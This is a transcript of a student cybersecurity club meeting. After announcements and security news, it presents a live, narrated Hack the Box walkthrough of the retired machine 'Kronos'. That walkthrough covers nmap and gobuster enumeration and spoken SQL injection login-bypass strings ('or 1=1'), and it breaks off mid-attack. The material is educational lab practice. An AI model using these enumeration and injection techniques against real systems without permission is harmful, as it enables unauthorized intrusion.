Hello, everyone. Welcome back to our Friday meeting. My name is Michael Charisi, President of Ucf. If you have not already, please feel free to sign in. This helps us track attendance and other qualifications for things we'll mention later. This will be open the entire time. If you're looking to be an active member, just gives you some extra statuses to be an officer and vote. Other than that, you're missing out on nothing. That link will be posted in chat. So just a few ways you can stay informed with us. We do have a mailing list. We send out an email once a week about our Friday meeting and our workshops that we have on the weekends. You can visit our shop and our Discord for some of our apparel, merchandise, and some of our meet with some of our members, ask questions, get announcements, all that fun stuff's in the Discord. If you're not in that Discord already, please make sure you're in that. That's the best way to get in touch with us and to get all the announcements the quickest way to us, to you. And of course, we do have a Twitter. Follow us for all cyber happenings and tweets in support of some of our sister organizations. And we also do some announcements on there as well. So today's topics, we're going to be going over some of the announcements that we have. And then Daniel will be bringing us current events. This Saturday, we have a workshop on honeypots, and we'll explain a little bit more about that later. And then the main talk today is going to be another one of our deep dives, the last meeting of the month. I'm going to be doing a live hack the box demonstration. You'll see what a actual engagement of that looks like. Gonna pick apart while we do it. And then after that, we'll close whenever that may be. If you're wondering how to get more involved with the club and you see a lot of people talking in the Discord and you want to know what are those people up to, on the back end, you can join our operations team, which are a group of dedicated individuals who volunteer their time to help us run these meetings and prepare things for workshops and pitch ideas. If you're interested in helping out the club in any capacity that you can, there's no obligation. You're welcome to show up and just feel around for a little bit and see if there's any way you would like to contribute. We're not going to hold you accountable to anything that you can't do. If that sounds interesting, please stop by our ops meetings every Tuesday at 8 p.m. The link for that will be posted in our Discord the day of. So the announcements today, we're going to mention some of our t-shirts that we have available. And then we're going to discuss the elections and nominations procedure. We're not yet accepting those, but we just want to let you know of that as it is coming up in the next few weeks. So you have some time to prepare. Some CTFs happening this weekend, and the Cyber Challenge and NCL are those as well. So as has been open this entire semester, you are welcome to buy our t-shirts, which are available on our store. If you are a dues paying member, both in the past for the previous semester, and if you're paying dues very recently in the last few weeks, you should have received a coupon code for these t-shirts. You get $10 off the price for those members. If you're not a dues paying member, that's all right. You still get those t-shirts. However, they are not going to be discounted for you. All three of these are available on our online store, with the central one being showcased as that was the winning design of the last semester. So coming up in a few weeks, we will be having our elections. That's actually April 9th. We'll be voting on April 9th for the next 4 officers. And more information about this will, of course, be distributed as we get closer to the nomination date. The nomination will be on the 19th. Starting then, we are accepting nominations until the 6th. Some requirements by the club outlined in our constitution. You must first attend 50% of the attendance in our meetings. That's why we have the sign-in link, and that's why it's helpful if you sign into Zoom with your Knight's email. The more accurate method of tracking attendance is better. And you must have been an active student member in the fall of 2020. What that basically says is you can check your status in the Discord based on the channel that you can see. There's an active student member and I think dues paying member. If you're not sure of all that, please feel free to email us or reach out to us on Discord. Again, more information about this will be sent out to as we get closer to the date. If you don't plan on running as officer, none of this you don't have to worry about. There's some Ucf requirements that our advisor has to check to make sure you're actually qualified to be an officer of the club, there is a GPA and I believe term limit, not a term limit, a credit limit. So you must take at least 6 credit hours and maintain a 2.5 GPA. Again, if you're not sure, that will be validated, and you'll be informed of that before the elections. You won't be surprised the day of. If you're a graduate student, you need 5 credit hours and maintain a 3.0 GPA. For more specific information about all of this and any information specifically about the positions that are open, we do encourage you to check out the Constitution in its entirety and in context. That's available at hackucf.org/constitution. And that's where you'll find the most updated information than whatever I may have said just now in case I misspoke. So please use that as the source of reference. If you need any CTF practice or looking to do some CTF stuff, our CTF site is available 24/7 all the time, Jeopardy style. So if you're looking to see these competitions and are not quite sure if you're up to the challenge, this is a no stakes, completely open game for you to play and practice. That's available at ctf.hackucf.org. Any other CTFs that we don't explicitly mention here will be available on ctftime.org. That is like one big repository for all CTF happenings over the weekend. And you can see upcoming CTFs and sign up for them via that referral. The 2 main ones that we have today, first one being the Cyber Challenge. That's the 12th annual CyberQuest. The competition is now open for registration and it's actually free. So there's no reason not to sign up. If you're a top competitor, you will be invited to an exclusive cyber bootcamp and compete in the finals. Being able to compete in a finals for a CTF, going into the cyber field, into industry, that can look really nice in your resume. If that's something you're going into, such like offensive security or anything around that, CTF definitely looks good on your resume. Even if you're not going to cyber offensive, I've seen recruiters, they love people who still compete in those CTFs. Sometimes it's even a checkbox on the recruitment. I was asked, do you compete in CTFs? I'm like, yes. And they're like, great, that's all we're looking for. You don't have to do good as long as you try. Because it shows some initiative that you're actually willing to go in your own time and do cyber related things and want to know more. And that looks great. And for that competition, it ends on the 14th. So you've got a few more days to register and get competed. The National Cyber League, if you've been around for a while, you may have heard of this last semester. They are doing a second one in less than a year now. The turnout was very good the first time, so they're actually making a second one in the spring. Registration is available at this link. That is a referral link using our coach code. So what that does is it associates you with UCF and our advisor, so you can get some representation with HackUCF and UCF and not compete independently. Registration is $35, but this is another one of those great CTFs that you want to compete in if you're able to get the finances for that. The individual games are the 26th to 28th of March, and the team game is April 9th to April 11th. I know there are a few people in the Discord interested in doing so, and we do have a CTF channel. So if you're looking for a team or want to help recruit for your team, you're welcome to discuss this in the HackUCF Discord. There's also a NightSec role that you can get with your bots that they handle all kinds of CTFs. So if you're seeing the CTFs and want even more, feel free to get that role yourself in the bot commands channel. And lastly, tomorrow at noon, we will be having a Honeypot Workshop. If you were in attendance in last week's meeting, we briefly talked about a honeypot and showed how that can be visualized in Splunk. There was some interest to see more of that. So we have developed a workshop on just that. We'll be going over basics of honeypots and the practical use for them, and this will be led by me. We're going to see the honeypot last week, and we did develop a new one that's a much more high interaction, and it gives us much more interesting data to look at. So if you're interested in that or research aspect of honeypots and to learn more about honeypots, please stop by tomorrow. And with that, let's move on to current events brought to you by Daniel. So take it away.
All right, there we go. Can you all hear me?
Yep.
Fantastic, cool. All right, so current events. Can we get the next slide, please? Awesome. So Silver Sparrow found nesting on 30,000 Macs. This one's particularly interesting because it is a JavaScript-based malware specifically targeted for Mac OS, and it manages to affect both the M1 and the x86 variants. The payload for this right now is unknown. They're assuming that it's adware, sorry, but it does execute binaries that are downloaded via curl. So there really is no limit to like how nasty this thing could get if its creator wanted to, make it really bad. It was discovered by researchers at Red Canary. They discovered it and named it Silver Sparrow Red Canary. There's something going on there. So what they found was that the main storage location for this malware is in an AWS3 bucket, and they are distributing it via Akami's CDN, which is like really interesting because Akami's like one of their main focuses is security. So the fact that they're distributing malware via what should be a secure content delivery network is really impressive. They don't know exactly when it was created. It was discovered on the 17th of February, and it was reported on by the 19th. If you want to read more, link at the bottom there is threat post Silver Sparrow. Next slide, please. All right, now this one is tricky. So I'm sure that a lot of you out there are just like me, and you try to browse as privately as possible, right? Clearing your cache, like mitigating, and keeping cookies to a minimum, private mode if you need it for whatever reason, maybe even using a VPN. Unfortunately, some researchers out at the University of Illinois, Chicago have managed to find a really tricky way to defeat basically every known way to clear a browsing session out. Chrome, Safari, and Edge are all vulnerable. Firefox would have been vulnerable, but a bug that exists in Firefox's source prevents this from actually working. Brave is currently the only browser known right now to have been notified of this and remediated it, but all the others are currently working on it. The way that this works is, if you've ever noticed when you're browsing, the little icon that exists next to the tab or in the window of the website that you're on, that's called a fave icon, right? Now, fave icons have been standardized in browsers since 2006, right? So this has been around for a long time, and this apparently has been exploitable the entire time there. What the researchers, the four listed below, were able to do is by using 32 redirects, they were able to essentially create enough entropy, right, on unique fave icons that are stored on your machine to be able to identify you and your browser uniquely across any session. The way that they do that is they just send different fave icons for every single different page. So now, while it seems silly that you would do 32 redirects just to get to a page, it would take in their research 2 minutes to load. You wouldn't need that much, right? You would only need a couple of them to try to put users into buckets and to track them accordingly. So really, really interesting use of parts of a browser that have not been exploited before. The only real way to remediate this completely is to disable fave icons. Some browsers are easier to do than others. There are definitely guides out there for it. You should look it up if you are worried about it at all. And there are unfortunately browsers in which you can't really clear this out. So just keep on the lookout. I'm sure that in a couple of months we will have a huge big refresh, and this will be done away with. Ars Technica did a great documentation, did a great write-up on it. You can search for them. Next slide. All right. And finally, Anonymous declares war on Myanmar. I don't know if anyone's been paying attention to what's going on in the country formerly known as Burma, but there's been a lot of issues brewing between their government and their military for a long time. And the military junta stood up a couple of months ago, I believe, maybe it was last month. And essentially they are apparently, allegedly, violently repressing and preventing the freedom of speech of their population. Anonymous has been pushing the hashtags #OpMyanmar and Tango Down since at least 2013. I couldn't find much more past before that, but they've decided to pivot into a more active role, and they are currently conducting denial of service operations across the entire country's infrastructure, from the presidency to the national bank. The main intent is to bypass censorship put in place by the military junta. Just be aware that things like this are going on and that Anonymous is out there doing crazy stuff again. And that should be it for current events.
All right, thank you, Daniel, for the current events today. So the main topic today is going to be a Hack the Box deep dive. So what that means is I'm going to be walking through a Hack the Box live with you all today, and we'll basically see what exactly that looks like from a red team's perspective. I'll narrate along the way. We'll also open the floor for people to unmute themselves, to open any discussion as to what's happening, and we can hopefully have a communication going. This is being recorded, so please don't say anything you don't want obviously recorded and published on web courses and or our YouTube. We will be doing a retired box today, so you can't exactly follow along, unfortunately, if you don't have Hack the Box VIP. However, this makes it most easy for us to upload and publish without being frowned upon for doing a active Hack the Box. So before I jump over to my pen testing box and actually get started into that, let's first briefly talk about what is Hack the Box in case you're not familiar with that. It's much like Hack This Site and things I've seen mentioned in the Discord. Hack the Box is a penetration testing platform in which you're provided multiple different operating systems and machines running all different kinds of applications, and you test the penetration testing against that. It is an education platform, so there is no risk in using it. It's perfectly legal. You have permission to hack these boxes once you connect to their VPN. It's an education platform, practice offensive security with no risk at all. They do have machines provided for you, I think like 20 or something or 30 of them at a time. So you shouldn't run out of boxes unless you really get good and can knock them out real fast. A machine gets retired every week on rotation. So once a box retires on their Saturday, a new one takes its place, I believe of the same difficulty. So they have 4 difficulties: easy, medium, hard, and insane. Today we'll be doing a medium. They also have a Pwn box, which is a fairly new service. So if you're brand new into this and don't even have a computer to test from, they do offer a cloud Parrot OS instance. Parrot OS is kind of the cousin to Kali Linux. It's a Linux distribution with plenty of tools installed to help facilitate attacks. It is a cloud service, so they can provide that with you, and you connect in your web browser, so you don't even need any software installed. I have my own VM, so I'll be doing that instead. And it's a great tool for anyone beginning and getting those skills developed. And even those more advanced ones, you can try those harder difficulty boxes and really go at it. I've not done an insane, but I've seen them. And as the name implies, they are pretty insane. So I'm going to open the floor for discussion while I switch over machines. All right. And then we'll jump into our deep dive. Wrong button. All right, let me, okay, can we see my Parrot instance? Not done this before. All right, cool. So the first thing I'm going to do is start with the terminal. I've already created a folder for this box and done an nmap scan beforehand, just to help speed things along. Is the terminal size all right as well?
Maybe increase 1 or 2 sizes.
Control. Go to preferences. Yeah, I've done that before. Oh, it's over here. File, edit, view. Zoom in. Oh, it's Control++. Okay. All right, that should be good enough.
Yeah, that looks better.
I'm not sure what I'm be doing, Sachin, actually. I've not done this box before. I've taken a quick peek at it yesterday because I thought it would be at least a good idea to look at it and see what I'm getting myself into. Addison did also read the write-up, so I can get hints as well. But mostly it's going to be from scratch. Metasploit may come into play. I may try to find a way to use it as well. So I'm going to first start the VPN because I've not done that before. Open VPN, sudo, run that as sudo, of course, to get connected, and then it just activates VPN. Password, super secure password. You'll never guess what it is. Error configuration file, hack the box. That's interesting.
You have to use config, I believe.
Do I? That's never happened before. That's unfortunate.
Do OVPN, not VPN.
OVPN.
Your file extension
This is
was .vpn, but the file
Yes.
has a .ovpn.
Oh,
You just put the file name wrong.
OVPN. There we go. That's an excellent start to our Hack the Box
You
deep
have 2 more
dive.
hints left.
Oh, dang. Yes, Amir, there is a check-in. That link can be posted in chat. All right, now that we're actually connected to the VPN, I can actually run scans against that box. So in this folder, I created a folder for Kronos, which is the box we're doing today. And I'll read the scan that was done yesterday. So the scan that I've performed is an Nmap scan with these arguments. I choose, this is kind of how I do my scans. The N flag specifies do not reverse DNS lookup this name. That just makes it so that the IP address doesn't try to find a domain name. It runs a little faster. The A stands, it basically runs multiple scripts to give me this more verbose information. And the O specifies an output file I've called mine scanned. The PTAC says scan all ports. And ports are doors on a machine where multiple applications can be listening and are exposed on. And you see those down here. And then, of course, the IP address I want to scan. And of course, you're welcome to ask questions throughout this, and I'll explain it to the best of my ability. So the machine is online, and it has 3 ports open. The first one being port 22, and Nmap has identified it as SSH. And then here's the information about that. Port 53 is DNS. They call it domain, but it's DNS servers, which resolves IPs to host names. And then port 80, TCP, is a web server. It's running Apache on Ubuntu. Looks to be the default page. And that's what we're going at with today. So doing Hack the Box quite often, I'm familiar with port 22, that is SSH. That's not going to be our area of access today, at least not immediately. That's usually once you have credentials, you can then authenticate to that port. 53 is DNS. We can maybe guess some domain names, but I don't know how profitable that will be unless it's an exploit against DNS. Port 80 is the website. So there's probably going to be a lot of fun stuff on there. So we'll start with the website and go on with there. So the IP address is here. So I'll just copy and paste that into a browser. So I'll open Firefox, comes with the parrot. And we'll go. So that's the Apache default page. Once you install Apache for the first time on Ubuntu, you're building a website. This is basically what you're presented with. It works, right? So you built the website, you've gotten the web content on there, but this comes with it, and it's just, Ubuntu default page. I've seen this quite a few times, and it's not very informational. You may think that, oh, it's a default service page. Someone misconfigured the service. This can be exploited. But usually that's not the case. At least I don't believe it is here. It just seems to be a normal special install of Apache. So there's probably more information that we're not seeing. More information like that. An extension I have as well on my Firefox that did not come with this install is called Wapalizer. I've seen it used commonly throughout. It's basically a plugin that tells you what applications and programs are being run on this server. So I can see it's Apache version 2.4.18, and it's running Ubuntu as an operating system. With those version numbers, I can actually look up in the exploit database to find exploits against those versions. However, I'm going to try and enumerate a little more as I'm still early on in the phases to help eliminate some of the issues or some of the false positives. I don't want to go down a rabbit hole and start searching for vulnerabilities. That's not even the way in. Another thing I forgot to mention was the names of the machines in Hack the Box. This one's called Kronos, which I could be smart and say, oh, that's Greek for the word time, but I don't even know. It could be Latin, but it's time something, right? So Hack the Box names are sometimes hints to how to exploit the box in one form or another. So I can assume that this box may have something to do with time or race conditions or Kronos, maybe even cron or cron tab, or those are task schedulers in Linux. Exploit Y2K, yeah. We'll set the clock back and crash the whole system. But that information doesn't do me very good, but it's something to keep in mind. based on this Ubuntu page, I will also do some enumerations against DNS as well, because it is a DNS server. So the first thing I'll do is switch back to my terminal, and I'll edit my host file and add the box name to my host file. The host file is basically a local DNS resolver. So if I want to go to like google.com, that resolves google.com, right? That resolves an IP address here, right? That's Google's IP address. Hack the boxes have their own naming conventions. And again, it can be challenging just getting started. But once you do hack the boxes, there is a naming convention that they follow. So I do need to be sudo. I'll just keep sudo for the session so I can just always have root. So I'll edit my etc hosts file. And then these are just the default rules are created. This is just a guess here. I'm not guaranteeing that this is like the step for all of them. This is just the process I'm going to go through and see what happens. So the IP address of this mean is 10.10.10.13, I believe. And the host name is Kronos. What's up, Addison?
That's correct. 13.
Yes, thank you. Kronos.hackthebox. Once you do a lot of domains on these machines, they will just be called .htb for .hackthebox and the name. I've never seen a machine on HackTheBox not follow this naming convention, so it's usually a good place to start. And what that allows us to do is instead of accessing the IP address, is access Kronos.hackthebox directly, and it gives us a different web page. So how does that work? Because we're using Apache, and you can do this with other web servers, the application actually takes a look at the actual request you're making. And because it can see the actual URL request that I'm going at. So an IP address is just that, an IP address. In the server configuration file, it does not have a name for where that goes. So it lands on the default page. And I'm probably explaining this horribly. I do apologize. The Apache server sees that I'm accessing via Kronos.hackthebox and says, okay, that's a legitimate URL. I know what Kronos.hackthebox is. It's this page we're looking at. So it goes from there. A reverse proxy, is that what it's called? In this context, probably yes. I'm familiar with it differently. Apache calls it vhosts, but yeah, it's reverse proxy. So basically one server can have multiple websites on it by just simply changing the configuration on which URL to go. Some people do it for convenience because it's easier to type in the IP address. I'm sorry, it's easier to type in the name than the IP address. I am familiar with a few hack the boxes doing this trick where they give you a different name to go at. But yeah, the naming convention on Kronos hack the box, maybe you can somehow enumerate the DNS server and brute force it. It also is a very common thing on hack the box. So it kind of just comes with experience. Once you do a few boxes, you can tell. But other than the DNS server that we haven't touched yet, it's possible it may have given you that way if you can find a way to brute force it. But a lot of hack the box additional foothold is going to be a lot of guessing and enumeration because you're starting off on a clean slate. You have so much to focus on. How do you know what's important? Enumeration is the most important step here. So with Kronos hack the box, I am on a brand new page. I'll check the source because I totally know how to read HTML. I'm just looking for anything obviously stupid, like a comment with the password or something stupid. So we're just seeing it here. I see Jeffrey mentioned Laravel. Jeffrey does a lot of web dev, so I'm scared. Does that mean she recognizes this? It's just CSS, normal web stuff, nothing suspicious fishy in here. I do see a few links in here for these links down here. So these links here are just going to like outside sources. So these here are outside the scope of HackTheBox. They are public websites. So these are not in scope. I will not be attacking these. I'm just like seeing where the links go. Do not attack these. That's actually a crime. Just in case you weren't aware, these are public facing. Sometimes they have links that point you elsewhere. So in the bottom left of my screen, you can see the actual URL that goes to. Sometimes you'll see like on HackTheBoxes, if you hover over it, instead of seeing a public site, you may see like kronos.hackthebox/admin or /login or something like that. And then you'll know like, hey, there's a page there. So I'll change my host file again and get into those files. But that does not seem to be the case here. The most notable one here is like a GitHub, which is a public code repository. So we'll have a lot of code to look at. This is a medium, so I don't know if I'm going to be reading an entire Git repo and finding an exploit in their custom software. Laravel is a web application framework, yada, yada. Fun. Anything in the config folder, auth.php, defaults, web users. This is a framework, you're not going to be using this. All right. Yeah, I don't know web, so this is all scary. Look at that. There's an arrow in your code, right? What does that mean? That's just PHP stuff. Like they've visually identified an equal sign to be an arrow, but like to the human, that's an arrow. To the computer, that's an equals greater than, like why? Because, you know, code. Nothing like default creds in here, just looking for anything like that. So it's probably not going to be the framework we exploit. So I'll close my Laravels and look elsewhere. So this is a website. So on websites, we can try different like slash, like if you go to things like on Hack the Box or our own website, HackUCF, we have hackucf.org/Discord for the Discord invite, slash like t-shirts, I think at one point for t-shirt stuff. Those all redirect elsewhere because of like rules we've set up on our web server. So that could be something they're doing here. So how do we check that? There's a command for that. It's called GoBuster. I'm gonna open a new terminal just so I'm not cool. Got it. So it's got a tool called GoBuster, and what that does, it's a directory buster written in Go, as the name implies. I can run it without arguments to see the options we have. So I'll be doing dir right now, and that's going to brute force not subdomains. It's going to brute force like URLs, I guess. I don't know the proper name for them. Directory brute forcing, as it says there. I can just read rather than guess. So GoBuster takes two arguments, a word list, which are present on these machines like Parrot and Kali. I've also downloaded a custom one that I'll be using today. I've downloaded SecLists. You can get that with an app install SecLists or visit the GitHub. SecLists, that's how you spell it. And you can Google that and find more information about that. That's kind of an expansion on the default ones that have likely more profitable information. So let's download it to user share SecLists. And it'll be under discovery, web content. That's not it. And then I'll do like common, I think is one of them. I'll look for common directories on the website and back in the terminal. And then back into U is going to be the URL I want to attack. So because I know Chronos Attack the Box is different than the IP address, I'm going to actually exploit that directly. I'm just going to brute force it, that hack the box. And I'm going to change the thread count so it goes much faster than what it should be. Let's start with 25. I don't know how this box will like that. 12%, 21%, so we'll give it a second. So these are all directories that I found with my word list. This is not all of the directories. These are the ones in my common.txt web file. So as you can see, we've attacked the URL here, the word list I've used, the status codes it searched for, and some stuff I found. The 403, I believe, is forbidden. 301 is a redirect, which means it's a valid URL. 200 is like an okay, you did it. You can access that still. 403, not going to be profitable. On first glance, getting into this, you may think server status is good and like, oh, that's something I can get into. But that's not helpful. But I've seen it. It's common on Apache. I can browse there, and I don't think anything will be there. But it'll probably give me a 403, like access denied. Yeah, I don't have permission to access that. Nothing I can do with that. We also did see robots.txt. That is a text file telling your server what you can, telling your client what you can and cannot access. So if there was a disallow here saying, don't go to this directory, thanks for telling me, I'm gonna go there anyway and see what's there. But that doesn't seem to be the case here. The last thing that we see is a non-standard directory, web config. That's not a common one I'm familiar with. So let's take a look and see what that is. Oh boy. XML. So it seems to be a configuration, a URL rewrite. Yeah, server status and the HT files are common in Apache. The HT files are, I believe, are credentials. However, you can usually never read those. They'll hash anyway. It's just, if I believe those are, or the credentials and I think access permissions, stuff like that. Good stuff for an attacker if you have the permissions, but I can't read them yet. So it seems there's a URL here, and that appears to be regex. Web dot config. Gonna see where that's coming from. Microsoft says so. For some reason, this is apparently an official Microsoft doc saying that web.config is an official thing of Microsoft IIS, which is the Microsoft web server. And I don't think this is a Windows web server. So I'm not sure where it's pulling from, but it definitely is like the stuff here. But it's just a API fancy thing. Not sure you can do much of that. More docs. Sensitive files. Skimming through this. Hope I'm not missing anything. I'm not sure why it's specific to IIS and why it's being present on a Linux web server. That is very interesting. So going through here, ASP.NET Core, probably not a thing here. Environment variables, all lame stuff. We have like environment variables here in this sample config, but in the one actually that we have is nothing of importance, at least to first glance. So it seems to be regex what that means. So what we see here is a match URL, which probably is a URL rewrite as specified here. So that regex converts into, I'll do my best to read regex. The caret, let me make this bigger actually. So what this means is caret means the beginning of the line. So the URL that I type in from the beginning of it, in this group, dot star means any character, and then forward slash, and then dollar sign. Dollar sign means the end of the line. So we have the start of the line and the end of the line, and then in between those have any amount of characters and end with a slash. So probably just this would match that rule. And then it's in conditions, as input, request file name, if directory, action type or redirect to, I'm assuming argument 1 or something like that. Probably says if you have a forward slash, remove the forward slash so that way you can access the website. Websites do really weird things sometimes where if you have a trailing slash, it won't work, or if you don't specify index.txt or HTML, it won't work. So they rewrite that on the back end. Anything that ends all right. Some other information in chat. So this seems to just be a normal rewrite rule, changing how things work. So, and this is a match URL basically thing. The beginning of the line, as long as your string has a start point, I presume. Match type, okay, file name. So in like web speak, I think request file name, that just means like index.html, basically where you're trying to go. It's not like actually downloading files. It's just, you know, the actual request you're making. Take the request you're making, do some changes to it, inject it back in with some suffix and prefix attended to it. And the type is a rewrite. So that's a URL rewrite. There's no extra hosts in here. There's no IP addresses in here. It's just XML. There's no application. It's not PHP. It doesn't seem to be useful. The CSS 301 probably because of that rule. The CSS is just something. I don't know what it stands for, but it's fancy CSS. Basically tells you how the page looks. When you see text all clumped together like that, it's most likely like downloaded from a repo somewhere or a public source. It's not going to be part of the exportable application. Cascading style sheet. Fun. So seems to be running up on a dead end on this regard. So we'll go back to here, back on Chronos. You can convert HT access files to web configure some tools. Sounds fancy and some web stuff. Hopefully it doesn't come to that, but I don't know what that means. So with that, we'll try DNS stuff. I've never exploited DNS, but we'll take a quick peek and see if anything happens. So in pen testing, you can tell my experience with this particular tool because I'm actually looking for it in the GUI. Exploitation, information gathering, DNS attacks. Look at that. In which a domain for DNS entries, PostScript enumerate. This one sounds interesting. Oh, this is fun. DNS attack 6. DNS dictionary. This is not even a ATK 6. What a crazy command. DNS network, DNS dictionary. Okay. So in which a domain for DNS entries, it uses a dictionary file it's applied. So I'll say dump the word list to perform service scanning. I will say domain chronos.hackthebox. Dictionary file, I presume I have to give a word list. User share. Word list, sec list again, and there's one for DNS, I believe. That's not word list, it's back out to here. List. Let me and then in sec list, I'll say DNS or discovery, then DNS. I'll say just give me a subdomains top 5,000. There's a thread count, I believe I saw. Tag T. Default 8, max 32, so I'll give it 18. That's not useful. Are those all valid domains, or are those just like things I tested? Or did I just read that file to my terminal? That's not helpful. Also possible I have no idea what I'm doing, which is very likely. A subdomain. So I'm just, this is weird. I guess also dump IPv4 addresses. Is that useful? Nothing more points there. If I want to test actual subdomains, is a better host for that. Back to GoBuster. GoBuster. There is a function of GoBuster called vhost. That's very similar to how we access the web page in the first place. So accessing chronos.hackthebox, we changed the name to chronos.hackthebox. I believe that's a vhost config in Apache, if I'm not mistaken, but there could be more based on subdomains as well as directories. So we'll try that and hopefully that comes up with something. So GoBuster, I'll say instead of dir, I'll look for vhost. It's the same syntax. So word list, user share, sec lists, discovery, web or DNS subdomains. Subdomains, top 1 million, I'll say 20,000, because that should be not too slow, although it looks 40. And then the URL I want to specify is chronos.hackthebox. And we go. That's running a bit slow, but it found admin, which is good. We'll let it finish, it's not gonna take too long. So as you can see by the results I'm getting, it is finding for subdomains. So like shop.hackthebox.org, we can buy some awesome apparel, and this, well, you can't buy, but there was a time for this hacker hoodie. We do have other hoodies though. The only thing it found in the top 20,000 subdomains is admin.chronos.hackthebox. So in order to access that, I'm gonna have to add that to my Etsy hosts file again. So sudo nano Etsy hosts file. That's it. So I'll say again 10, 10, 10, 13. I'll add admin.chronos.hackthebox. And I'm gonna take a wild guess and say that's an admin panel of sorts where I can probably log into. And that's fun web stuff. So on here, admin.chronos.hackthebox. That's fun. So I see a login page with an advertisement that's either not loading or being blocked by one of my 12 extensions. Source code to take a peek, just to see anything obvious. And that's all we're looking at. So we've got CSS, nothing important. It's just like styling, make it look pretty, make that look pretty. Background color, style, yada, yada. The only thing on here is a form basically saying take a username, take a password, submit value, div style. Okay, the only thing on this page is a login form. The advertisement's not even real. It's called advertisement, but there's actual no like link to it as far as I can tell. So it's just there to look real. So we have a login form, which probably means we have to guess default creds, and using the complete hacker skills, we'll just guess the admin password. So if you default admin, yep. Stop. None of this is gonna work Firefox. Stop asking. Admin all caps I've seen. Could you like, thank you. Password admin I've seen. Probably not gonna work. Admin or Kronos password. Likelihood is working on a medium, very low. So we could try Sql Injection. I do know a few of them. Ironically enough, I did just take one of my school assignments for my minor was actually to do Sql Injection. And if you're interested in doing more Sql Injection and web stuff like that, I would recommend WebGoat. That's what my professor made us use, and it was actually very interesting and a guided instructional walkthrough of Sql Injection specifically. So hopefully I can take this rare occasion to take something I learned in my class and apply it to Hack the Box. So to explain this kind of in a way, we will open a terminal and kind of briefly explain SQL in the best way that I can. So the way this works, if you're familiar with SQL and thinking databases, there's a database somewhere, assuming, that stores a table, which is basically an Excel spreadsheet showing usernames and passwords. And the information that I present in this page will be queried against the database and say, does this username and does this password match a row in my Excel spreadsheet? And if it does, log in as that user, right? So hopefully that makes some sense. So the statement being used here is select, I'm guessing here, this is completely arbitrary. I have no idea what's on the back end here. But assuming it's SQL and relational database, it'll be a select user name from users where name equals username. And we'll do caps because fancy. And password equals password, right? So something I actually learned in the class was the distinction between these fields. The username is going to be a specific, it's going to be a string. So there's actually going to be quotes around this. And the password most likely as well. The information that we get, and of course, please do read up on SQL Injection if this is interesting. I'm most confident I cannot explain it in the best way that someone else who do this professionally can. So the username and password that we take will go directly into this function and be run on the back end. What we can assume is that this is a poor website and it's vulnerable to injection. What that means is that whatever I put in username will be added to here. So there's going to be a weird looking command, and I'll explain it first and then show it if it works. The user's name is this quotes here that we have to escape and add our own SQL into this and inject our own SQL. So if we put in admin, it's going to look like this. Admin. But a common form of SQL injection is the old 1 = 1. So the syntax of that is 1 parentheses, one parentheses or parentheses 1 parentheses, that's not the one, parentheses 1 parentheses equals parentheses 1. Okay, so what that means is you can see as I've injected my own parentheses into here, it is kind of included that in the syntax. So it now reads select username from users where username equals 1 or 1 = 1. And you can see, and it worked that way because the quotes I put them in a specific way. So because 1 = 1, and that's always true, this statement would always resolve true. And if I do the same thing for password as well, you'll see if the username and password equals 1 or the statement is true and the statement's true. This works on like a Boolean operator. So if the entire thing is true, then you get credentialed access. So we're looking to do authentication bypass here. So I'm saying I don't know the username, but I do know that 1 = 1. do you think 1 equals 1? And the server's like, yep, it does. That's true. Statement resolves. Congratulations, you have access. As like the first user in the chain or the admin or something like that. And what actually picked up in the class was that because it's a string, you have to first, it's not going to take an integer. You first have to give it a string to fill in. So in here, you should do admin instead, or any string. It doesn't matter at all. So when name equals this garbage or 1 equals 1. So I'm redefining a integer cast to a string cast, stuff like that. Hopefully that made sense. Hopefully that at least showed how Sql injection works on the back end. Now let's actually try it. There's tools for this, but I've never had them work. So I'm going to try this first and then try the tools. So 1 or 1 equals 1. And we're leaving the quotes that way because we want to escape the ones already present in the SQL statement. I believe that's the correct syntax for it. Oh, no. There we go. And I'll copy and paste this and do it for both and see if that works. That did not work. Do admin. All right. Let's try the whole string thing. So I'll give it garbage characters, that or 1 equals 1. I'll do it for both as well, because if it works once, it should work for both. That did not work. What else do we got? Chronos. I think it has to be username. I thought it was garbage characters, but it should. Get to the last closing bracket. Is that what I did? I don't have it on the clipboard anymore. You're right. I don't think I do. Because no. So admin. Yeah, admin. Admin closing bracket. Maybe I typed it wrong. Admin blank comment. Comment plus a comment. Do you think that would work? Any cookies being sent clues in the HTML error message? No. We can actually take a look at that, and I'll switch open burp, which is a more fancy web exploit, at least it's manual. And it'll look crazy, but I'll do my best to explain it. We'll look on a very specific focus here. If you pay for burp, you can do like Sql injection for you automatically. But I don't pay for it. So I'll tell you that information here. So I'll go over to my proxy, make sure that's enabled. I think it's enabled by default. Settings, options, proxy, good. Here, preferences, proxy settings, manual, that's set because I've used this before. And I'll look for just like username to send garbage data to get a request into burp, password, and that should be logged in burp, hopefully. Here we go. So you can see the actual raw request I've made here, host, user agent, information like that, referrer, cookie, and the information I've sent in plain text. I can view the response. I'll do it that way. Can I render? It works. I've never had that work in Kali. Works in a Parrot. So what this basically is, the left side is what I'm sending, the right side is what I'm getting back. So we can try stuff until this fails, or this gives us something different. Another thing we're recommending, I've seen recommended, is trying in the comment line. So I can try that here much easier. Can't edit that because I'm not in repeater, which is basically saying this is the raw data. If I want to edit it and repeat this thing and relay it, I have to move it to repeater, and now we can see actually the stuff I can edit. So I'll try what's in there. So I'll try 1 or I can spell. I don't think it has to be capitalized, but it helps. Equals 1. Comment, or that's very fancy. We'll see if that works. I've never seen that syntax before, but we'll try. I'll try for both. Why not? So, and it's invalid. I would try here. I'll try admin. Invalid as well. We'll go into. We'll look for Sql Authentication Bypass. We'll look for common codes here. Proxy service between connections. Cool. Just turn off our proxy real quick so I can access the internet. No proxy. Okay. Sql Authentication Bypass. Hopefully someone has code on the internet already. There's this guy. There's Portswigger, Actrix. He's got all these fun ones that'll work, apparently. Sql Injection is, that's a garbage site. Oh, this is like a walkthrough on how to do it. I'll stick to the guy and brute force it. So these are all things that he says will work, at least for thing, old wasp, stuff like that. So I'll take this and I'll just automate my attacks. Rather than run all of them, I'll throw them into burp suite. So back on my page here, I'll go to my proxy. Just getting, if I'm lost anyone, jump at these menus, please stop me and speak up or ask questions. I'm basically putting my Firefox to go through burp, and burp acts as a proxy. So my requests in Firefox go to my local machine through burp, and burp analyzes them, intercepts them, and then sends them off to the information. Okay. And then in burp, we can see that information. So I need to go to send to intruder, which performs an automated attack. And my positions, I want to basically say, what variables do you want to exploit? And I'll say, add a field here and add a field here. And it will send this request multiple times, changing those fields that I've outlined. In my payload, 